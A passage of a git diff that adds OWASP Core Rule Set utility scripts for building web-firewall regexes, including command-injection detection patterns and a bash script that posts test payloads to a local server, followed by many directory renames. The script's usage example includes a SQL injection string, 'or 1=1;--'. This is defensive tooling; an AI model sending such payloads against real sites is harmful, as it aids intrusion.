-0,0 +1,29 @@ +#!/usr/bin/env perl +# +# Create one regexp from a set of regexps. +# Regexps can be submitted via standard input, one per line. +# +# Requires Regexp::Assemble Perl module. +# To install: cpan install Regexp::Assemble +# +# See: https://coreruleset.org/20190826/optimizing-regular-expressions/ +# + +use strict; +use Regexp::Assemble; + +my $ra = Regexp::Assemble->new; +while (<>) +{ + # Handle possessive qualifiers + # https://rt.cpan.org/Public/Bug/Display.html?id=50228#txn-672717 + my $arr = $ra->lexstr($_); + for (my $n = 0; $n < $#$arr - 1; ++$n) + { + if ($arr->[$n] =~ /\+$/ and $arr->[$n + 1] eq '+') { + $arr->[$n] .= splice(@$arr, $n + 1, 1); + } + } + $ra->insert(@$arr); +} +print $ra->as_string() . "\n"; diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-assemble.pl b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-assemble.pl new file mode 100755 index 000000000..a74b530f1 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-assemble.pl @@ -0,0 +1,20 @@ +#!/usr/bin/env perl +# +# Create one regexp from a set of regexps. +# Regexps can be submitted via standard input, one per line. +# +# Requires Regexp::Assemble Perl module. +# To install: cpan install Regexp::Assemble +# +# See: https://coreruleset.org/20190826/optimizing-regular-expressions/ +# + +use strict; +use Regexp::Assemble; + +my $ra = Regexp::Assemble->new; +while (<>) +{ + $ra->add($_); +} +print $ra->as_string() . "\n"; diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-cmdline.py b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-cmdline.py new file mode 100755 index 000000000..818997011 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-cmdline.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python +# +# Convert a word list to a list of regexps usable by Regexp::Assemble. +# +# Examples: +# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl +# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Refer to rule 932100, 932110, 932150 for documentation. +# + +import fileinput, string, sys + +# Convert a single line to regexp format, and insert anti-cmdline +# evasions between characters. +def regexp_str(str, evasion): + # By convention, if the line starts with ' char, copy the rest + # verbatim. + if str[0] == "'": + return str[1:] + + result = '' + for i, char in enumerate(str): + if i > 0: + result += evasion + result += regexp_char(char, evasion) + + return result + +# Ensure that some special characters are escaped +def regexp_char(char, evasion): + char = str.replace(char, '.', '\.') + char = str.replace(char, '-', '\-') + char = str.replace(char, '+', r'''(?:\s|<|>).*''') + # Unix: "cat foo", "catfoo" + char = str.replace(char, '@', r'''(?:[\s,;]|\.|/|<|>).*''') + # Windows: "more foo", "more,foo", "more;foo", "more.com", "more/e", + # "morefoo" + char = str.replace(char, ' ', '\s+') + # Ensure multiple spaces are matched + return char + +# Insert these sequences between characters to prevent evasion. +# This emulates the relevant parts of t:cmdLine. +evasions = { + 'unix': r'''[\\\\'\"]*''', + 'windows': r'''[\"\^]*''', +} + +# Parse arguments +if len(sys.argv) <= 1 or not sys.argv[1] in evasions: + print(sys.argv[0] + ' unix|windows [infile]') + sys.exit(1) + +evasion = evasions[sys.argv[1]] +del sys.argv[1] + +# Process lines from input file, or if not specified, standard input +for line in fileinput.input(): + line = line.rstrip('\n ') + line = line.split('#')[0] + if line != '': + print(regexp_str(line, evasion)) diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-tricks/negative-lookahead.py b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-tricks/negative-lookahead.py new file mode 100644 index 000000000..8669f94b9 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-tricks/negative-lookahead.py @@ -0,0 +1,121 @@ +import argparse + +# WARNING: This script is EXPERIMENTAL. Use with caution. +# +# Known issues: +# * At the moment, it will probably not work with more than two strings. +# +# Known limitations: +# * Any substrings of a target string will also NOT be matched. This is probably due to a limitation in this technique, +# make sure that subtrings of the negative lookahead are not harmful in any way. + +parser = argparse.ArgumentParser(description="This script takes a list of strings and converts them into \ + a regex that acts like a negative lookahead") +parser.add_argument("strings", type=str, nargs='+', + help="the strings to convert into a negative lookahead") +parser.add_argument("--prefix", type=str, default="", + help="sets a prefix for the resulting regex") +parser.add_argument("--suffix", type=str, default="", + help="sets a suffix for the resulting regex") + +args = parser.parse_args() + +# Return the longest prefix of all list elements. Shamelessly copied from: +# https://stackoverflow.com/questions/6718196/determine-prefix-from-a-set-of-similar-strings +def commonprefix(m): + "Given a list of pathnames, returns the longest common leading component" + if not m: return '' + s1 = min(m) + s2 = max(m) + for i, c in enumerate(s1): + if c != s2[i]: + return s1[:i] + return s1 + +# flatten returns a string with concatenated dictionary keys +def flatten(dict): + s = "" + + for key in dict.keys(): + s += key + + return s + +# set returns a character set containing the unique characters across all strings for the given index +def set(strings, index, flags): + dict = {} + + for s in strings: + # Continue so we don't panic + if index > len(s) -1: + continue + + dict[s[index]] = '' + + return "[" + flags + flatten(dict) + "]" + +# prepare converts a string for negative lookaheads emulation +def prepare(s, offset): + r = "" + + if len(s) == 0: + return r + + for i in range(offset, len(s)): + for j in range(0, i + 1): + if j == i: + r += "[^" + s[j] + "]" + else: + r += s[j] + + if i != len(s) - 1: + r += "|" + + return r + +# run runs the +def run(): + strings = args.strings + + r = "" + r += set(strings, 0, "^") + + c = "" + d = {} + + # Only find common string if we have more than one + if len(strings) > 1: + c = commonprefix(strings) + + # Collect all characters after the common substring from every string + for s in strings: + if len(s) > len(c) and s.startswith(c): + d[s[len(c)]] = '' + + # Add the common string to the regex to prevent accidental matching + if len(c) > 0: + if len(c) > 1: + r += "|" + "(?:" + prepare(c, 1) + ")" + + r += "|" + "(?:" + c + "[^" + flatten(d) + "]" + ")" + + for s in strings: + g = "" + + # When the common string is > 0, offset with len(c) + 1 because we handled this earlier + if len(c) > 0: + g = prepare(s, len(c) + 1) + else: + g = prepare(s, 1) + + # Add OR boolean if necessary + if len(g) > 0: + r += "|" + + r += g + + print(args.prefix + "(?:" + r + ")" + args.suffix) + +# Only run if script is called directly +if __name__ == "__main__": + run() diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/send-payload-pls.sh b/src/common/core/modsecurity/files/coreruleset-v3/util/send-payload-pls.sh new file mode 100755 index 000000000..b769a930d --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/send-payload-pls.sh @@ -0,0 +1,170 @@ +#!/bin/bash +# +# Script to post a payload against a local webserver at each paranoia level. +# +# Note: Webserver has to be prepared to take desired PL as Request Header "PL". +# +# WARNING: Setting the paranoia level using a header without proper +# authentication and authorization is extremely dangerous, and is not +# recommended for production. +# +# Check how to use the Christian Folini's Apache access log format at: +# https://www.netnea.com/cms/apache-tutorial-5_extending-access-log/ +# +# LogFormat "%h %{GEOIP_COUNTRY_CODE}e %u [%{%Y-%m-%d %H:%M:%S}t.%{usec_frac}t] \"%r\" %>s %b \ +# \"%{Referer}i\" \"%{User-Agent}i\" \"%{Content-Type}i\" %{remote}p %v %A %p %R \ +# %{BALANCER_WORKER_ROUTE}e %X \"%{cookie}n\" %{UNIQUE_ID}e %{SSL_PROTOCOL}x %{SSL_CIPHER}x \ +# %I %O %{ratio}n%% %D %{ModSecTimeIn}e %{ApplicationTime}e %{ModSecTimeOut}e \ +# %{ModSecAnomalyScoreInPLs}e %{ModSecAnomalyScoreOutPLs}e \ +# %{ModSecAnomalyScoreIn}e %{ModSecAnomalyScoreOut}e" extended +# +# This script assumes %{ModSecAnomalyScoreIn}e is the column before to last in +# the access log, if this does not match your LogFormat the script won't work +# For better results set the SecDefaultAction to 'pass'. +# +# The anomaly score envvar can be set as follows: +# SecAction "id:90101,phase:5,pass,nolog,\ +# setenv:ModSecAnomalyScoreIn=%{TX.anomaly_score}" +# +# Sample rule to setup the PL dynamically from localhost" +# SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,192.168.0.128" \ +# "id:90102,phase:1,pass,capture,log,auditlog,\ +# msg:'Setting engine to PL%{matched_var}',chain" +# SecRule REQUEST_HEADERS:PL "@rx ([1-4])" \ +# "setvar:'tx.executing_paranoia_level=%{matched_var}'" + +# Path to CRS rule set and local files +CRS="/usr/share/modsecurity-crs/rules" +accesslog="/apache/logs/access.log" +errorlog="/apache/logs/error.log" +URL="localhost:40080" +protocol="http" +while [[ $# > 0 ]] +do + case "$1" in + -c|--crs) + CRS="$2" + shift + ;; + -a|--access) + accesslog="$2" + shift + ;; + -e|--error) + errorlog="$2" + shift + ;; + -u|--url) + URL="$2" + shift + ;; + -r|--resolve) + resolve="$2" + resolve="--resolve $resolve" + shift + ;; + --protocol) + protocol="$2" + shift + ;; + -P|--payload) + PAYLOAD="$2" + shift + ;; + -h|--help) + echo "Usage:" + echo " --access \"/apache/logs/access.log\"" + echo " --error \"/apache/logs/error.log\"" + echo " --url \"localhost:40080\"" + echo " --resolve \"someservername:40080:localhost\"" + echo " --protocol \"https\"" + echo " --payload \"/tmp/payload\"" + echo " --help" + exit 1 + ;; + esac + shift +done + +echo "Using CRS: $CRS" +echo "Using accesslog: $accesslog" +echo "Using errorlog: $errorlog" +echo "Using URL: $URL" +echo "Using protocol: $protocol" + +if [ -z "${PAYLOAD+x}" ]; then + echo "Please submit valid payload file as parameter. This is fatal. Aborting." + $0 -h + echo "Examples:" + echo " ./send-payload-pls.sh -a /logs/test/access.log \ + -e /logs/test/error.log -u test.test.test.com:6443 --protocol https \ + --payload /tmp/payload --resolve test.test.test.com:6443:192.168.0.128" + echo " ./send-payload-pls.sh -a /logs/test/access.log \ + -e /logs/test/error.log -u test.test.test.com:6443 --protocol https \ + --payload 'or 1=1;--' --resolve test.test.test.com:6443:192.168.0.128" + exit 1 +fi + +# URL of web server + +# Rules per Paranoia level +# Paranoia level 1 rules, rule 012 is the delimiter of the start of PL1 +# Paranoia level 1 rules, rule 013 is the delimiter of the end of PL1 +PL1=$(awk "/012,phase:2/,/013,phase:1/" $CRS/*.conf |egrep -v "(012|013),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') + +# Paranoia level 2 rules, rule 014 is the delimiter of the start of PL2 +# Paranoia level 2 rules, rule 015 is the delimiter of the end of PL2 +PL2=$(awk "/014,phase:2/,/015,phase:1/" $CRS/*.conf |egrep -v "(014|015),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') + +# Paranoia level 3 rules, rule 016 is the delimiter of the start of PL3 +# Paranoia level 3 rules, rule 017 is the delimiter of the end of PL3 +PL3=$(awk "/016,phase:2/,/017,phase:1/" $CRS/*.conf |egrep -v "(016|017),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') + +# Paranoia level 4 rules, rule 018 is the delimiter of the start of PL4 +# Paranoia level 4 rules, "Paranoia Levels Finished" delimiter of the end of PL4 +PL4=$(awk "/018,phase:2/,/Paranoia Levels Finished/" $CRS/*.conf |egrep -v "018,phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') + +echo "Sending the following payload at multiple paranoia levels: $PAYLOAD" +echo + +for PL in 1 2 3 4; do + echo "--- Paranoia Level $PL ---" + echo + if [ -f "$PAYLOAD" ]; then + curl $protocol://$URL $resolve -k --data-binary "@$PAYLOAD" -H "PL: $PL" -o /dev/null -s + else + curl $protocol://$URL $resolve -k -d "$PAYLOAD" -H "PL: $PL" -o /dev/null -s + fi + + # Here are three ways to get the transaction unique id, + # the first one is Christian's format, second is Spartan's format, + # and the third one tries to guess which is the unique id using a + # regular expression, the first two require specific format. + # The automatic format detection may cause the script to malfunction. + # Uncomment only the required format. + # To use Christian's accesslog format uncomment the following line + uniq_id=$(tail -1 $accesslog | cut -d\" -f11 | cut -b2-26) + + # To use Spartan's accesslog format (21 col) uncomment the following line + #uniq_id=$(tail -1 $accesslog | awk '{print $21}') + + # To use the automatic unique_id detection uncomment the following line + #uniq_id=$(tail -1 $accesslog | egrep -o '[a-zA-Z0-9]{26,28}') + + echo "Tracking unique id: $uniq_id" + + grep $uniq_id $errorlog | sed -e "s/.*\[id \"//" -e "s/\(......\).*\[msg \"/\1 /" -e "s/\"\].*//" -e "s/(Total .*/(Total ...) .../" -e "s/Incoming and Outgoing Score: [0-9]* [0-9]*/Incoming and Outgoing Score: .../" | sed -e "s/$PL1/& PL1/" -e "s/$PL2/& PL2/" -e "s/$PL3/& PL3/ " -e "s/$PL4/& PL4/" | sort -k2 | sed -r "s/^([0-9]+)$/\1 FOREIGN RULE NOT IN CRS/" + + echo + echo -n "Total Incoming Score: " + + # Here are two ways to get the transaction anomaly score, + # the first one is Christian's format, second is Spartan's format + # To use Christian's accesslog format uncomment the following line + tail -1 $accesslog | cut -d\" -f11 | cut -d\ -f14 | tr "-" "0" + + # To use Spartan's accesslog format (21 col) uncomment the following line + # To use a different column change the $NF value, e.g. $(NF-1) + #tail -1 $accesslog | awk '{print $NF}' | tr "-" "0" + echo +done diff --git a/src/common/core/modsecurity/files/coreruleset/util/verify.rb b/src/common/core/modsecurity/files/coreruleset-v3/util/verify.rb similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/verify.rb rename to src/common/core/modsecurity/files/coreruleset-v3/util/verify.rb diff --git a/src/common/core/modsecurity/files/coreruleset/util/virtual-patching/arachni2modsec.pl b/src/common/core/modsecurity/files/coreruleset-v3/util/virtual-patching/arachni2modsec.pl similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/virtual-patching/arachni2modsec.pl rename to src/common/core/modsecurity/files/coreruleset-v3/util/virtual-patching/arachni2modsec.pl diff --git a/src/common/core/modsecurity/files/coreruleset/util/virtual-patching/zap2modsec.pl b/src/common/core/modsecurity/files/coreruleset-v3/util/virtual-patching/zap2modsec.pl similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/virtual-patching/zap2modsec.pl rename to src/common/core/modsecurity/files/coreruleset-v3/util/virtual-patching/zap2modsec.pl diff --git a/src/common/core/modsecurity/files/coreruleset/.changes-pending.md b/src/common/core/modsecurity/files/coreruleset-v4/.changes-pending.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.changes-pending.md rename to src/common/core/modsecurity/files/coreruleset-v4/.changes-pending.md diff --git a/src/common/core/modsecurity/files/coreruleset/.editorconfig b/src/common/core/modsecurity/files/coreruleset-v4/.editorconfig similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.editorconfig rename to src/common/core/modsecurity/files/coreruleset-v4/.editorconfig diff --git a/src/common/core/modsecurity/files/coreruleset/.github/FUNDING.yml b/src/common/core/modsecurity/files/coreruleset-v4/.github/FUNDING.yml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/FUNDING.yml rename to src/common/core/modsecurity/files/coreruleset-v4/.github/FUNDING.yml diff --git a/src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/01_false-positive.md b/src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/01_false-positive.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/01_false-positive.md rename to src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/01_false-positive.md diff --git a/src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/02_false-negative.md b/src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/02_false-negative.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/02_false-negative.md rename to src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/02_false-negative.md diff --git a/src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/03_bug-report.md b/src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/03_bug-report.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/03_bug-report.md rename to src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/03_bug-report.md diff --git a/src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/04_feature.md b/src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/04_feature.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/04_feature.md rename to src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/04_feature.md diff --git a/src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/config.yml b/src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/config.yml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/config.yml rename to src/common/core/modsecurity/files/coreruleset-v4/.github/ISSUE_TEMPLATE/config.yml diff --git a/src/common/core/modsecurity/files/coreruleset/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md b/src/common/core/modsecurity/files/coreruleset-v4/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md rename to src/common/core/modsecurity/files/coreruleset-v4/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md diff --git a/src/common/core/modsecurity/files/coreruleset/.github/create-changelog-prs.py b/src/common/core/modsecurity/files/coreruleset-v4/.github/create-changelog-prs.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/create-changelog-prs.py rename to src/common/core/modsecurity/files/coreruleset-v4/.github/create-changelog-prs.py diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/check-pr-dependencies.yaml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/check-pr-dependencies.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/check-pr-dependencies.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/check-pr-dependencies.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/check-pr-title.yaml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/check-pr-title.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/check-pr-title.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/check-pr-title.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/lint.yaml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/lint.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/lint.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/lint.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/nightly.yml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/nightly.yml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/nightly.yml rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/nightly.yml diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/stale.yml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/stale.yml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/stale.yml rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/stale.yml diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/test.yml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/test.yml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/test.yml rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/test.yml diff --git a/src/common/core/modsecurity/files/coreruleset/.github/workflows/update-changelog.yaml b/src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/update-changelog.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.github/workflows/update-changelog.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/.github/workflows/update-changelog.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/.gitignore b/src/common/core/modsecurity/files/coreruleset-v4/.gitignore similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.gitignore rename to src/common/core/modsecurity/files/coreruleset-v4/.gitignore diff --git a/src/common/core/modsecurity/files/coreruleset/.gitmodules b/src/common/core/modsecurity/files/coreruleset-v4/.gitmodules similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.gitmodules rename to src/common/core/modsecurity/files/coreruleset-v4/.gitmodules diff --git a/src/common/core/modsecurity/files/coreruleset/.linelint.yml b/src/common/core/modsecurity/files/coreruleset-v4/.linelint.yml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.linelint.yml rename to src/common/core/modsecurity/files/coreruleset-v4/.linelint.yml diff --git a/src/common/core/modsecurity/files/coreruleset/.pre-commit-config.yaml b/src/common/core/modsecurity/files/coreruleset-v4/.pre-commit-config.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.pre-commit-config.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/.pre-commit-config.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/.yamllint.yml b/src/common/core/modsecurity/files/coreruleset-v4/.yamllint.yml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/.yamllint.yml rename to src/common/core/modsecurity/files/coreruleset-v4/.yamllint.yml diff --git a/src/common/core/modsecurity/files/coreruleset/CHANGES.md b/src/common/core/modsecurity/files/coreruleset-v4/CHANGES.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/CHANGES.md rename to src/common/core/modsecurity/files/coreruleset-v4/CHANGES.md diff --git a/src/common/core/modsecurity/files/coreruleset/CONTRIBUTING.md b/src/common/core/modsecurity/files/coreruleset-v4/CONTRIBUTING.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/CONTRIBUTING.md rename to src/common/core/modsecurity/files/coreruleset-v4/CONTRIBUTING.md diff --git a/src/common/core/modsecurity/files/coreruleset/CONTRIBUTORS.md b/src/common/core/modsecurity/files/coreruleset-v4/CONTRIBUTORS.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/CONTRIBUTORS.md rename to src/common/core/modsecurity/files/coreruleset-v4/CONTRIBUTORS.md diff --git a/src/common/core/modsecurity/files/coreruleset/INSTALL.md b/src/common/core/modsecurity/files/coreruleset-v4/INSTALL.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/INSTALL.md rename to src/common/core/modsecurity/files/coreruleset-v4/INSTALL.md diff --git a/src/common/core/modsecurity/files/coreruleset/KNOWN_BUGS.md b/src/common/core/modsecurity/files/coreruleset-v4/KNOWN_BUGS.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/KNOWN_BUGS.md rename to src/common/core/modsecurity/files/coreruleset-v4/KNOWN_BUGS.md diff --git a/src/common/core/modsecurity/files/coreruleset/LICENSE b/src/common/core/modsecurity/files/coreruleset-v4/LICENSE similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/LICENSE rename to src/common/core/modsecurity/files/coreruleset-v4/LICENSE diff --git a/src/common/core/modsecurity/files/coreruleset/README.md b/src/common/core/modsecurity/files/coreruleset-v4/README.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/README.md rename to src/common/core/modsecurity/files/coreruleset-v4/README.md diff --git a/src/common/core/modsecurity/files/coreruleset/SECURITY.md b/src/common/core/modsecurity/files/coreruleset-v4/SECURITY.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/SECURITY.md rename to src/common/core/modsecurity/files/coreruleset-v4/SECURITY.md diff --git a/src/common/core/modsecurity/files/coreruleset/SPONSORS.md b/src/common/core/modsecurity/files/coreruleset-v4/SPONSORS.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/SPONSORS.md rename to src/common/core/modsecurity/files/coreruleset-v4/SPONSORS.md diff --git a/src/common/core/modsecurity/files/coreruleset/crs-setup.conf.example b/src/common/core/modsecurity/files/coreruleset-v4/crs-setup.conf.example similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/crs-setup.conf.example rename to src/common/core/modsecurity/files/coreruleset-v4/crs-setup.conf.example diff --git a/src/common/core/modsecurity/files/coreruleset/docs/README b/src/common/core/modsecurity/files/coreruleset-v4/docs/README similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/docs/README rename to src/common/core/modsecurity/files/coreruleset-v4/docs/README diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920100.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920100.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920100.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920100.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920120.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920120.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920120.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920120.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920220-chain1.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920220-chain1.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920220-chain1.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920220-chain1.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920221.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920221.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920221.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920221.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920260.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920260.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920260.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920260.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920521.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920521.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920521.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920521.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/920600.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920600.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/920600.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/920600.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/921421.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/921421.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/921421.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/921421.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/921422.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/921422.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/921422.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/921422.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/922110-chain1.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/922110-chain1.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/922110-chain1.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/922110-chain1.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/930100.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/930100.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/930100.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/930100.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/931130.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/931130.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/931130.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/931130.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/931131.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/931131.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/931131.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/931131.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932125.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932125.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932125.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932125.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932130.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932130.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932130.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932130.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932131.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932131.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932131.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932131.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932140.ra 